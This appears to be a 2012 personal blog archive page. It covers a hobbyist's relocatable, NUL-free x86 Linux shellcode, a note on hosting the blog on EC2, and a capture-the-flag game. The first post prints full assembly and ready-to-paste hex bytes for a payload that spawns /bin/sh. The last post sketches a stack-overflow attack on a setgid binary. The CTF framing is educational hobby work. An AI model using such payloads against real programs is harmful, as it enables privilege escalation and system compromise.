Monthly Archives: July 2012

Relocatable shellcode without NULs

Listening to metal and smashing stacks at TheCamp.dk 2012 for fun and fame… 🙂

My creation of the day so far:

# echo $$
26506
# cat sc.asm
section .text
global _start
_start:
        xor eax, eax     ; 31 c0
        inc eax          ; 40
        shl eax, 3       ; c1 e0 03
        inc eax          ; 40
        inc eax          ; 40
        inc eax          ; 40
        jmp short $ + 16 ; eb 0e
        pop ebx          ; 5b
        xor ecx, ecx     ; 31 c9
        xor edx, edx     ; 31 d2
        int 0x80         ; cd 80
        xor eax, eax     ; 31 c0
        inc eax          ; 40
        xor ebx, ebx     ; 31 db
        int 0x80         ; cd 80
        call $ - 14      ; e8 ed ff ff ff
        db "/bin/sh", 0  ; 2f 62 69 6e 2f 73 68 00
# nasm -f elf sc.asm
# ld -o sc sc.o
# ./sc
# echo $$
26542

Here you go:

printf '\x31\xc0\x40\xc1\xe0\x03\x40\x40\x40\xeb\x0e\x5b\x31\xc9\x31\xd2\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00'

In the cloud

  

This blog is now being served by the software WordPress, Apache HTTP Server, MariaDB and Ubuntu Linux, all of which are running in a free instance in Amazon Elastic Compute Cloud.

So don’t tell me that I’m not into the game! 😛

Edit: Now I’m also using the web application accelerator Varnish. The main culprit with regard to the blog’s speed, however, seems to be HTML-resized images. This means that you always download full-size images, even though you only need small/medium versions. I haven’t found a solution for this yet. Well, at least not a free solution – the WordPress plugin ImageScaler isn’t free.

A picture of me moving the blog and blogging about it (beware of white skin!):

Treasure hunt

At the moment I’m having a jolly good time playing the game Treasure hunt. My good friend Peter Tersløv Forsberg (ptrf) gave an interesting talk about it at TheCamp.dk 2012.

The game was launched by the two computer science students br0ns and iDolf (nicknames) in May 2012 at DIKU. You’re welcome to try it out at treasure.pwnies.dk. Disguised as a game about being a pirate on the seven seas, the game gives you staged hacking challenges and rewards you with gold when you complete them. Your amount of gold dictates your placement on the game’s scoreboard. It’s all about fun and fame. If you know Project Euler and Capture the flag, look at Tresure hunt as a mixture of those two.

In the above screen shot of my terminal, I solve one of the challenges. Take a look at the lines in the terminal. Come on! Don’t be afraid 😛 Click on the screen shot to view it in its original size. I’m logged in as the user root. No, root isn’t your usual root user. He has no special privileges at this system. I want to read the file win, since it contains gold and a pointer to the next challenge. The file win, however, can only be read by the users daemon and exploitme. It’s obvious that the user daemon is the administrative user of the system. Since daemon has the ability to e.g. crash the server, I’m guessing that the objective is to read the file win by becoming the user exploitme, not daemon. Of course, the name also hints it strongly 🙂 The executable assignment3 has the group ID exploitme and has been given the setgid attribute. If I can exploit this executable, i.e. make it do what I want it to do, I can read the file win.

Since I don’t want to spoil the game for other players, I will not publish the details of my solution. I will only say this: My first argument to the assignment3 executable is a portion of homemade 32 bit x86 bytecode that executes /bin/sh by making a Linux sys_execve system call. My second argument overflows the stack of one of the functions in the executable, thereby tricking the executable into executing the first argument.

Now I deserve a beer 😀